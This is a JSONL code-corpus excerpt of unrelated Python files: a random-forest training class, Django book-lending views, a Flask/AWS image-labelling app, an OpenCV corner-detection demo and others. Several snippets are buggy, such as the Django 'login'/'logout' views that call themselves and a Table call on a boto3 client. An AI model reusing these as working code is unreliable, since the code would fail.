self.corresp_clusters[oldKey] = data_[[AGREGATS, 'Clusters']].drop_duplicates(keep = 'first').copy()\n \n # Les fois suivantes, on attribue aux nouvelles valeurs leur cluster le plus proche\n # Attention: on ne veut pas que le merge reset l'index de notre donnée car on veut pouvoir la remettre dans l'ordre\n index = datas[oldKey].index\n n = 1000\n #self.corresp_clusters[oldKey][AGREGATS] = np.round(self.corresp_clusters[oldKey][AGREGATS] * n).astype(int)\n #datas[oldKey][AGREGATS] = np.round(datas[oldKey][AGREGATS] * n).astype(int)\n print(self.corresp_clusters[oldKey][AGREGATS])\n print(datas[oldKey][AGREGATS])\n datas[oldKey] = datas[oldKey].merge(self.corresp_clusters[oldKey], on = AGREGATS, how = 'left')\n datas[oldKey].index = index\n datas[oldKey]['Clusters'] = datas[oldKey]['Clusters'].astype(int)\n \n # Split sur la colonne cluster dans des keys tuple\n for cluster in datas[oldKey]['Clusters'].unique():\n newKey = (oldKey, cluster)\n datas[newKey] = datas[oldKey][datas[oldKey]['Clusters']==cluster].copy()\n \n \n \n # Plot optionnel des nuages de point\n if plot:\n print(\"Clustering sur la vitesse (variables centrées-réduites) : \"+str(oldKey))\n data_.plot.scatter(x = COURBURE, y = TOTAL_COYOTE, c = 'Clusters', colormap='viridis')\n data_.plot.scatter(x = COURBURE, y = TRAFIC, c = 'Clusters', colormap='viridis')\n data_.plot.scatter(x = TOTAL_COYOTE, y = TRAFIC, c = 'Clusters', colormap='viridis')\n plt.show()\n \n # Suppression old key\n del datas[oldKey]\n \n \n return datas\n \n ## Learning or test data preparation phase\n def preprocessing_learning(self):\n trains = dict()\n targets = dict()\n \n for key in self.keys:\n # Choix des variables explicatives et target\n trainM = self.datas[key][self.quantis+self.qualiNoOrder+self.qualiOrder]\n YM = self.datas[key][CLASSES_SIMPLES]\n\n # Encoding du qualitatif\n trainM = ml_utils.preproc_features(trainM, self.quantis, self.qualiOrder, self.qualiNoOrder)\n\n # Centrage-Normalisation du quantitatif\n self.scaler_quanti[key].fit(trainM[self.quantis])\n self.scaler_qualiOrder[key].fit(trainM[self.qualiOrder])\n \n \n trainM[self.quantis] = self.scaler_quanti[key].transform(trainM[self.quantis])\n trainM[self.qualiOrder] = self.scaler_qualiOrder[key].transform(trainM[self.qualiOrder]) \n \n trains[key] = trainM\n targets[key] = YM\n return trains, targets\n \n def preprocessing_test(self, datas):\n trains = dict()\n \n for key in self.keys:\n # Choix des variables explicatives et target\n trainM = datas[key][self.quantis+self.qualiNoOrder+self.qualiOrder]\n\n # Encoding du qualitatif\n trainM = ml_utils.preproc_features(trainM, self.quantis, self.qualiOrder, self.qualiNoOrder)\n\n # Centrage-Normalisation du quantitatif\n trainM[self.quantis] = self.scaler_quanti[key].transform(trainM[self.quantis])\n trainM[self.qualiOrder] = self.scaler_qualiOrder[key].transform(trainM[self.qualiOrder]) \n \n trains[key] = trainM\n return trains\n \n ## Proper Learning & Learning Features\n def ref_columns(self):\n # On récupère l'union des colonnes car il se peut que certaines parties des nouvelles données à prédire ne les aient pas toutes\n cols = set()\n for key in self.keys:\n cols_ = set(self.trains[key].columns)\n cols = cols.union(cols_)\n # return as sorted list and not set (or there will be problems when ordering DataFrame columns)\n return sorted(cols)\n \n \n def fit(self, print_results = True, retourne = False):\n \n # Apprentissage sur chaque split\n for key in self.keys:\n for col in self.cols:\n if col not in self.trains[key].columns:\n self.trains[key][col] = 0\n self.trains[key] = self.trains[key][self.cols]\n self.rf[key] = self.rf[key].fit(self.trains[key], self.targets[key])\n \n if print_results:\n if retourne:\n mat, confusion, prec,recall,giny = self.predict_with_result(None, None, learning_data = True, print_ = True, retourne = retourne)\n return mat, confusion, prec,recall,giny\n else:\n self.predict_with_result(None, None, learning_data = True, print_ = True, retourne = False)\n \n \n def feature_importances_(self, plot = False):\n # On récupère la taille de tous les sous jeux de données pour pondérer la moyenne\n weights = []\n for key in self.keys:\n weights.append(len(self.datas[key]))\n \n # Intialisation du Df\n importances = pd.DataFrame(columns=self.cols)\n \n # On récupère les importances des RF\n for i, key in enumerate(self.keys):\n df_cols = self.trains[key].columns\n df = pd.DataFrame(columns = df_cols)\n df.loc[0] = self.rf[key].feature_importances_\n for col in self.cols:\n if col not in df_cols:\n df[col] = 0\n df = df[self.cols]\n importances.loc[i] = df.values[0,:]\n \n # Moyenne pondérée\n cols = importances.columns\n importances['weights'] = weights\n imp = []\n for col in cols:\n imp.append((importances[col]*importances['weights']).sum()/importances['weights'].sum())\n df_imp = pd.DataFrame()\n df_imp['Variables'] = imp\n df_imp.index = cols\n df_imp = df_imp.sort_values(ascending=False, by = 'Variables')\n if plot:\n df_imp.plot.bar(figsize = (10,7))\n self.importance = df_imp\n return self.importance\n \n \n ## Test & Performance Features\n def predict(self, test, learning_data = False, probas = False):\n \n # Stockage de la prédiction dans un vecteur Y qui sera réordonné\n Y = pd.DataFrame()\n if learning_data:\n tests = self.trains\n else:\n tests = self.split_function(test, first_time = False, plot = False)\n tests = self.preprocessing_test(tests)\n for key in self.keys:\n # Ajout des modalités de variables qualitatives qui ne seraitent pas présents dans l'échantiilon de test: on le met à zéro\n for col in self.cols:\n if col not in tests[key].columns:\n tests[key][col] = 0\n tests[key] = tests[key][self.cols]\n if probas:\n pred = self.rf[key].predict_proba(tests[key])[:,self.positive_class]\n else:\n pred = self.rf[key].predict(tests[key])\n Y = Y.append(pd.DataFrame({'pred':pred}, index = tests[key].index))\n Y = Y.sort_index()\n return Y.values\n \n def predict_with_result(self, test, y_true, learning_data = False, print_ = True, retourne = False):\n if learning_data:\n y_true = self.target\n y_pred = self.predict(test, probas = False, learning_data = learning_data)\n confusion = metrics.confusion_matrix(y_true, y_pred)\n prec = metrics.precision_score(y_true, y_pred, pos_label = self.positive_class)\n recall = metrics.recall_score(y_true, y_pred, pos_label = self.positive_class)\n giny = 2*metrics.roc_auc_score(y_true, y_pred)-1\n \n if print_:\n print(\"Matrice de confusion:\")\n print(confusion)\n print(\"Précision:\")\n print(prec)\n print(\"Recall:\")\n print(recall)\n print('Normalized Gini:')\n print(giny)\n \n if retourne:\n return y_pred, confusion, prec, recall, giny\n \n \n \n ## Save & Load Models\n def save(self, path):\n # Open the file to save as pkl file\n file = open(path, 'wb')\n pickle.dump(self, file)\n file.close()\n \n def load(self, path):\n return 0\n","sub_path":"flask/training/training_materiel.py","file_name":"training_materiel.py","file_ext":"py","file_size_in_byte":15013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"468627941","text":"from django.conf import settings\nimport os\n\nBASE_DIR = \"/Users/nrd1012/Projects/paragon/website/paragon\"\n\ndef setup_db():\n settings.configure(\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'pg_db.sqlite3'),\n }\n })\n\n","sub_path":"script/db_setup.py","file_name":"db_setup.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"306176252","text":"from django.shortcuts import (\n render,\n redirect,\n get_object_or_404,\n)\nfrom django.http import HttpResponse\n\nfrom django.views.decorators.http import require_POST\nfrom .models import Book\nfrom .forms import BookForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth import authenticate\n\ndef index(request):\n data = {\n 'books' : Book.objects.all(),\n }\n return render(request, 'book_lending_system/index.html',data\n )\n\ndef add(request):\n form = BookForm(request.POST or None)\n if form.is_valid():\n Book.objects.create(**form.cleaned_data)\n return redirect('book_lending_system:index')\n\n data = {\n 'form': form,\n }\n return render(request, 'book_lending_system/edit.html', data\n )\n\ndef edit(request, editing_id):\n\n book = get_object_or_404(Book, id=editing_id)\n if request.method == 'POST':\n form = BookForm(request.POST)\n if form.is_valid():\n book.title = form.cleaned_data['title']\n book.item_price = form.cleaned_data['item_price']\n book.save()\n return redirect('book_lending_system:index')\n else:\n # GETリクエスト(初期表示)時はDBに保存されているデータをFormに結びつける\n form = BookForm({'title': book.title,'item_price': book.item_price})\n d = {\n 'form': form,\n }\n\n return render(request, 'book_lending_system/edit.html', d\n )\n\ndef delete(request):\n delete_ids = request.POST.getlist('delete_ids')\n if delete_ids:\n Book.objects.filter(id__in=delete_ids).delete()\n return redirect('book_lending_system:index'\n )\n\ndef login(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n message = {\n 'text': '',\n }\n if user is not None:\n if user.is_active:\n login(request, user)\n return render(request, 'book_lending_system/index.html'\n )\n else:\n message.text = 'アカウントが有効ではありません'\n return render(request, 'book_lending_system/index.html', message\n )\n else:\n message.text = 'ユーザ名、またはパスワードが間違っています'\n return render(request, 'book_lending_system/index.html', message\n )\n\ndef logout(request):\n logout(request)\n return render(request, 'book_lending_system/login.html'\n )\n","sub_path":"book_lending_system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"230996950","text":"# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"\nTests to ensure that CLI commands work properly.\n\"\"\"\nfrom pathlib import Path\nfrom unittest import TestCase\n\nfrom dazl import sandbox\nfrom dazl.cli import _main\n\nDAML_PATH = Path(__file__).parent.parent.parent / '_template' / 'Main.daml'\n\n\nclass TestCliLs(TestCase):\n\n def test_simple_ls(self):\n with sandbox(daml_path=DAML_PATH) as proc:\n exit_code = _main(f'dazl ls --url {proc.url} --parties=Alice'.split(' '))\n\n self.assertEqual(exit_code, 0)\n\n def test_simple_ls_two_parties(self):\n with sandbox(daml_path=DAML_PATH) as proc:\n exit_code = _main(f'dazl ls --url {proc.url} --parties=Alice,Bob'.split(' '))\n\n self.assertEqual(exit_code, 0)\n\n def test_env_ls(self):\n import os\n with sandbox(daml_path=DAML_PATH) as proc:\n os.environ['DAML_LEDGER_URL'] = proc.url\n os.environ['DAML_LEDGER_PARTY'] = 'Alice'\n exit_code = _main('dazl ls'.split(' '))\n\n self.assertEqual(exit_code, 0)\n","sub_path":"python/tests/unit/test_cli_ls.py","file_name":"test_cli_ls.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"571811354","text":"'''\nA test lego that returns None\n'''\nfrom Legobot.Lego import Lego\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass NoneLego(Lego):\n\n @staticmethod\n def listening_for(message):\n logger.debug('nonelego checking...')\n try:\n return message['text'].split()[0] == '!none'\n except Exception as e:\n logger.debug('nonelego rejected message')\n logger.debug('Reason: %s' % e)\n return False\n\n def handle(self, message):\n logger.info('Handling message, returning None')\n opts = self._handle_opts(message)\n\n self.reply(message, None, opts)\n\n @staticmethod\n def _handle_opts(message):\n try:\n target = message['metadata']['source_channel']\n opts = {'target': target}\n except IndexError:\n opts = None\n return opts\n\n @staticmethod\n def get_name():\n return 'nonetest'\n\n @staticmethod\n def get_help():\n return 'Returns a None object to see if any legos explode.'\n","sub_path":"local/NoneLego.py","file_name":"NoneLego.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"398190753","text":"import boto3\r\nfrom pathlib import Path\r\nfrom flask import Flask, request\r\nfrom werkzeug.utils import secure_filename\r\nimport json\r\nimport urllib.parse\r\nfrom botocore.exceptions import ClientError\r\n\r\n\r\napp = Flask(__name__)\r\n\r\nS3_BUCKET = \"serverless-staircase-images\"\r\nS3_UPLOAD_KEY_NAME = \"{filename}\"\r\nDYNAMODB_TABLE = \"serverless_images_table\"\r\n\r\nAWS_ACCESS_KEY = \"\"\r\nAWS_SECRET_ACCESS_KEY = \"\"\r\n\r\nALLOWED_EXTENSIONS = {\"png\", \"jpg\", \"jpeg\"}\r\nUPLOAD_FOLDER = Path(__file__).resolve().parent\r\n\r\n\r\ndef allowed_file(filename):\r\n return \".\" in filename and \\\r\n filename.rsplit(\".\", 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\n\r\n@app.route(\"/upload\", methods=[\"POST\"])\r\ndef upload_image():\r\n \"\"\"Receives a request to upload an image.\"\"\"\r\n # Check if file was uploaded\r\n if \"file\" not in request.files:\r\n return \"No file uploaded\"\r\n\r\n file = request.files[\"file\"]\r\n # Check if file is allowed\r\n if not allowed_file(file.filename):\r\n return \"File extension not allowed\"\r\n\r\n # save file locally\r\n filename = secure_filename(file.filename)\r\n file_path = UPLOAD_FOLDER / filename\r\n file.save(file_path)\r\n\r\n file_key = S3_UPLOAD_KEY_NAME.format(filename=filename)\r\n upload_image_to_s3(file_path, file_key)\r\n\r\n return \"File uploaded successfully!\"\r\n\r\n\r\n@app.route('/get_info/', methods=[\"GET\"])\r\ndef get_image_info(image_name):\r\n db_client = boto3.client('dynamodb', aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n\r\n table = db_client.Table(DYNAMODB_TABLE)\r\n\r\n try:\r\n response = table.get_item(Key={'id': image_name})\r\n except ClientError as e:\r\n print(e.response['Error']['Message'])\r\n else:\r\n return response['Item']\r\n\r\n\r\ndef upload_image_to_s3(file_loc, s3_key):\r\n s3 = boto3.client(\"s3\", aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n with open(file_loc, \"rb\") as f:\r\n s3.upload_fileobj(f, S3_BUCKET, s3_key)\r\n\r\n print(f\"Image: {s3_key} uploaded to S3\")\r\n\r\n\r\ndef process_image(event, context):\r\n \"\"\"Lambda function which receives S3 event.\"\"\"\r\n\r\n s3 = boto3.client(\"s3\", aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n # Get the object from the event and show its content type\r\n bucket = event['Records'][0]['s3']['bucket']['name']\r\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\r\n try:\r\n response_image = s3.get_object(Bucket=bucket, Key=key)\r\n\r\n client = boto3.client('rekognition', aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n response = client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': key}}, MaxLabels=10)\r\n\r\n db_client = boto3.client('dynamodb', aws_access_key_id=AWS_ACCESS_KEY,\r\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\r\n\r\n str_response = json.dumps(response['Labels'])\r\n\r\n\r\n data = db_client.put_item(\r\n TableName=DYNAMODB_TABLE,\r\n Item={\r\n 'id': {\r\n 'S': key\r\n },\r\n 'image_labels_info': {\r\n 'S': str_response\r\n },\r\n 'image_labels_count': {\r\n 'N': str(len(response['Labels']))\r\n }\r\n })\r\n\r\n response = {\r\n 'statusCode': 200,\r\n 'body': 'successfully created item!',\r\n 'headers': {\r\n 'Content-Type': 'application/json',\r\n 'Access-Control-Allow-Origin': '*'\r\n },\r\n }\r\n\r\n except Exception as e:\r\n print(e)\r\n print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the '\r\n 'same region as this function.'.format(key, bucket))\r\n raise e\r\n","sub_path":"Part 2 - Image Recognition/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"187435898","text":"import os, sys, csv\nfrom SummaryStatistics import SS\n\ndef create_lists(filename):\n file = open(filename)\n num_lines = sum(1 for line in open(filename))\n print(num_lines)\n #users = [None]*(num_lines-1)\n #sessions = [None]*(num_lines-1)\n #events = [None]*(num_lines-1)\n\n users = []\n sessions = []\n events = []\n \n count = -1\n for line in file:\n if count > -1:\n parts = line.split(',')\n time = int(parts[0])\n #users[count] = parts[1]\n #sessions[count] = parts[2]\n #events[count] = parts[3].rstrip('\\n')\n\n users.append(int(parts[1]))\n sessions.append(int(parts[2]))\n events.append(int(parts[3].rstrip('\\n')))\n #time,users[count],sessions[count],events[count] = line.split(',')\n count = count + 1\n file.close()\n return users, sessions, events\n\ndef write_summary(fn,dictionary):\n w = csv.writer(open(fn, \"wb\"))\n for key, val in dictionary.items():\n w.writerow([key,val])\n \nday_user,day_session,day_event = create_lists(\"OSSUsersSessionsEventsByDay20160101-20170930.csv\")\nhour_user,hour_session, hour_event = create_lists(\"OSSUsersSessionsEventsByHour20160101-20170930.csv\")\n\nday_user = SS(day_user)\nday_session = SS(day_session)\nday_event = SS(day_event)\n\nhour_user = SS(hour_user)\nhour_session = SS(hour_session)\nhour_event = SS(hour_event)\n\nwrite_summary('day_user.csv',day_user)\nwrite_summary('day_session.csv',day_session)\nwrite_summary('day_event.csv',day_event)\nwrite_summary('hour_user.csv',hour_user)\nwrite_summary('hour_session.csv',hour_session)\nwrite_summary('hour_event.csv',hour_event)\n#print(day_user)\n","sub_path":"assn5/analyze_files.py","file_name":"analyze_files.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"485906311","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional\nfrom .annotation import (\n AdminData,\n Annotation,\n DocumentationBlock,\n VariationPoint,\n)\nfrom .category_string import CategoryString\nfrom .data_transformation_ref_conditional import DataTransformationRefConditional\nfrom .end_to_end_transformation_i_signal_props import EndToEndTransformationISignalProps\nfrom .i_signal_subtypes_enum import ISignalSubtypesEnum\nfrom .identifier import Identifier\nfrom .multi_language_overview_paragraph import MultiLanguageOverviewParagraph\nfrom .multilanguage_long_name import MultilanguageLongName\nfrom .ref import Ref\nfrom .short_name_fragment import ShortNameFragment\nfrom .someip_transformation_i_signal_props import SomeipTransformationISignalProps\nfrom .system_signal_group_subtypes_enum import SystemSignalGroupSubtypesEnum\nfrom .user_defined_transformation_i_signal_props import UserDefinedTransformationISignalProps\n\n__NAMESPACE__ = \"http://autosar.org/schema/r4.0\"\n\n\n@dataclass\nclass ISignalGroup:\n \"\"\"SignalGroup of the Interaction Layer.\n\n The RTE supports a \"signal fan-out\" where the same System Signal\n Group is sent in different SignalIPdus to multiple receivers. An\n ISignalGroup refers to a set of ISignals that shall always be kept\n together. A ISignalGroup represents a COM Signal Group. Therefore it\n is recommended to put the ISignalGroup in the same Package as\n ISignals (see atp.recommendedPackage)\n\n :ivar short_name: This specifies an identifying shortName for the\n object. It needs to be unique within its context and is intended\n for humans but even more for technical reference.\n :ivar short_name_fragments: This specifies how the\n Referrable.shortName is composed of several shortNameFragments.\n :ivar long_name: This specifies the long name of the object. Long\n name is targeted to human readers and acts like a headline.\n :ivar desc: This represents a general but brief (one paragraph)\n description what the object in question is about. It is only one\n paragraph! Desc is intended to be collected into overview\n tables. This property helps a human reader to identify the\n object in question. More elaborate documentation, (in particular\n how the object is built or used) should go to \"introduction\".\n :ivar category: The category is a keyword that specializes the\n semantics of the Identifiable. It affects the expected existence\n of attributes and the applicability of constraints.\n :ivar admin_data: This represents the administrative data for the\n identifiable object.\n :ivar introduction: This represents more information about how the\n object in question is built or is used. Therefore it is a\n DocumentationBlock.\n :ivar annotations: Possibility to provide additional notes while\n defining a model element (e.g. the ECU Configuration Parameter\n Values). These are not intended as documentation but are mere\n design notes.\n :ivar variation_point: This element was generated/modified due to an\n atpVariation stereotype.\n :ivar com_based_signal_group_transformations: This property was\n modified due to atpVariation (DirectedAssociationPattern).\n :ivar i_signal_refs: Reference to a set of ISignals that shall\n always be kept together.\n :ivar system_signal_group_ref: Reference to the SystemSignalGroup\n that is defined on VFB level and that is supposed to be\n transmitted in the ISignalGroup.\n :ivar transformation_i_signal_propss: A transformer chain consists\n of an ordered list of transformers. The ISignalGroup specific\n configuration properties for each transformer are defined in the\n TransformationISignalProps class. The transformer configuration\n properties that are common for all ISignalGroups are described\n in the TransformationTechnology class.\n :ivar s: Checksum calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine if\n an ArObject has changed. The checksum has no semantic meaning\n for an AUTOSAR model and there is no requirement for AUTOSAR\n tools to manage the checksum.\n :ivar t: Timestamp calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine\n the last change of an ArObject. The timestamp has no semantic\n meaning for an AUTOSAR model and there is no requirement for\n AUTOSAR tools to manage the timestamp.\n :ivar uuid: The purpose of this attribute is to provide a globally\n unique identifier for an instance of a meta-class. The values of\n this attribute should be globally unique strings prefixed by the\n type of identifier. For example, to include a DCE UUID as\n defined by The Open Group, the UUID would be preceded by \"DCE:\".\n The values of this attribute may be used to support merging of\n different AUTOSAR models. The form of the UUID (Universally\n Unique Identifier) is taken from a standard defined by the Open\n Group (was Open Software Foundation). This standard is widely\n used, including by Microsoft for COM (GUIDs) and by many\n companies for DCE, which is based on CORBA. The method for\n generating these 128-bit IDs is published in the standard and\n the effectiveness and uniqueness of the IDs is not in practice\n disputed. If the id namespace is omitted, DCE is assumed. An\n example is \"DCE:2fac1234-31f8-11b4-a222-08002b34c003\". The uuid\n attribute has no semantic meaning for an AUTOSAR model and there\n is no requirement for AUTOSAR tools to manage the timestamp.\n \"\"\"\n class Meta:\n name = \"I-SIGNAL-GROUP\"\n\n short_name: Optional[Identifier] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n \"required\": True,\n }\n )\n short_name_fragments: Optional[\"ISignalGroup.ShortNameFragments\"] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME-FRAGMENTS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n long_name: Optional[MultilanguageLongName] = field(\n default=None,\n metadata={\n \"name\": \"LONG-NAME\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n desc: Optional[MultiLanguageOverviewParagraph] = field(\n default=None,\n metadata={\n \"name\": \"DESC\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n category: Optional[CategoryString] = field(\n default=None,\n metadata={\n \"name\": \"CATEGORY\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n admin_data: Optional[AdminData] = field(\n default=None,\n metadata={\n \"name\": \"ADMIN-DATA\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n introduction: Optional[DocumentationBlock] = field(\n default=None,\n metadata={\n \"name\": \"INTRODUCTION\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n annotations: Optional[\"ISignalGroup.Annotations\"] = field(\n default=None,\n metadata={\n \"name\": \"ANNOTATIONS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n variation_point: Optional[VariationPoint] = field(\n default=None,\n metadata={\n \"name\": \"VARIATION-POINT\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n com_based_signal_group_transformations: Optional[\"ISignalGroup.ComBasedSignalGroupTransformations\"] = field(\n default=None,\n metadata={\n \"name\": \"COM-BASED-SIGNAL-GROUP-TRANSFORMATIONS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n i_signal_refs: Optional[\"ISignalGroup.ISignalRefs\"] = field(\n default=None,\n metadata={\n \"name\": \"I-SIGNAL-REFS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n system_signal_group_ref: Optional[\"ISignalGroup.SystemSignalGroupRef\"] = field(\n default=None,\n metadata={\n \"name\": \"SYSTEM-SIGNAL-GROUP-REF\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n transformation_i_signal_propss: Optional[\"ISignalGroup.TransformationISignalPropss\"] = field(\n default=None,\n metadata={\n \"name\": \"TRANSFORMATION-I-SIGNAL-PROPSS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n s: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"S\",\n \"type\": \"Attribute\",\n }\n )\n t: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"T\",\n \"type\": \"Attribute\",\n \"pattern\": r\"([0-9]{4}-[0-9]{2}-[0-9]{2})(T[0-9]{2}:[0-9]{2}:[0-9]{2}(Z|([+\\-][0-9]{2}:[0-9]{2})))?\",\n }\n )\n uuid: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"UUID\",\n \"type\": \"Attribute\",\n }\n )\n\n @dataclass\n class ShortNameFragments:\n short_name_fragment: List[ShortNameFragment] = field(\n default_factory=list,\n metadata={\n \"name\": \"SHORT-NAME-FRAGMENT\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class Annotations:\n annotation: List[Annotation] = field(\n default_factory=list,\n metadata={\n \"name\": \"ANNOTATION\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class ComBasedSignalGroupTransformations:\n data_transformation_ref_conditional: List[DataTransformationRefConditional] = field(\n default_factory=list,\n metadata={\n \"name\": \"DATA-TRANSFORMATION-REF-CONDITIONAL\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class ISignalRefs:\n i_signal_ref: List[\"ISignalGroup.ISignalRefs.ISignalRef\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"I-SIGNAL-REF\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class ISignalRef(Ref):\n dest: Optional[ISignalSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class SystemSignalGroupRef(Ref):\n dest: Optional[SystemSignalGroupSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class TransformationISignalPropss:\n end_to_end_transformation_i_signal_props: List[EndToEndTransformationISignalProps] = field(\n default_factory=list,\n metadata={\n \"name\": \"END-TO-END-TRANSFORMATION-I-SIGNAL-PROPS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n someip_transformation_i_signal_props: List[SomeipTransformationISignalProps] = field(\n default_factory=list,\n metadata={\n \"name\": \"SOMEIP-TRANSFORMATION-I-SIGNAL-PROPS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n user_defined_transformation_i_signal_props: List[UserDefinedTransformationISignalProps] = field(\n default_factory=list,\n metadata={\n \"name\": \"USER-DEFINED-TRANSFORMATION-I-SIGNAL-PROPS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n","sub_path":"autosar/models/i_signal_group.py","file_name":"i_signal_group.py","file_ext":"py","file_size_in_byte":12808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"534014231","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\nimport cv2 as cv\r\n\r\noriginal = cv.imread('../ml_data/box.png')\r\ncv.imshow('Original', original)\r\ngray = cv.cvtColor(original, cv.COLOR_BGR2GRAY)\r\ncv.imshow('Gray', gray)\r\ncorners = cv.cornerHarris(gray, 7, 5, 0.04)\r\nmixture = original.copy()\r\n# 把角点位置的像素颜色改为红色\r\nmixture[corners > corners.max() * 0.01] = [0, 0, 255]\r\ncv.imshow('Corner', mixture)\r\ncv.waitKey()\r\n\r\n\r\n","sub_path":"aid1901/day7/demo07_corner.py","file_name":"demo07_corner.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"370534334","text":"import media\nimport fresh_tomatoes\n\n# initialize each movie instance\nthe_matrix = media.Movie(\"The Matrix\",\n \"The film depicts a dystopian future in which reality\"\n \" as perceived by most humans is actually a simulated\"\n \" reality called 'The Matrix'\",\n \"http://en.wikipedia.org/wiki/The_Matrix\",\n \"http://upload.wikimedia.org/wikipedia/en/thumb/c/c1/\"\n \"The_Matrix_Poster.jpg/220px-The_Matrix_Poster.jpg\",\n \"https://www.youtube.com/watch?v=m8e-FF8MsqU\",\n \"March 31, 1999 (USA)\",\n \"http://en.wikipedia.org/wiki/The_Matrix#Cast\",\n \"R\")\n\nknights_tale = media.Movie(\"A Knight's Tale\",\n \"The film follows a peasant who is pretending to be\"\n \"a knight, along with his companions, in the world \"\n \"of medieval jousting.\",\n \"http://en.wikipedia.org/wiki/A_Knight%27s_Tale\",\n \"http://upload.wikimedia.org/wikipedia/en/thumb/a/a6\"\n \"/AKnightsTale.jpg/220px-AKnightsTale.jpg\",\n \"https://www.youtube.com/watch?v=zH6U5y086hw\",\n \"May 11, 2001 (USA)\",\n \"http://en.wikipedia.org/wiki/A_Knight%27s_Tale#Cast\",\n \"PG-13\")\n\nlast_samurai = media.Movie(\"The Last Samurai\",\n \"The film protrays a formerly retired officer of \"\n \"the US 7th Cavalry Regiment, whose personal and \"\n \"emotional conflicts bring him into contact with \"\n \"samurai warriors in the wake of the Meiji \"\n \"Restoration in 19th Century Japan.\",\n \"http://en.wikipedia.org/wiki/The_Last_Samurai\",\n 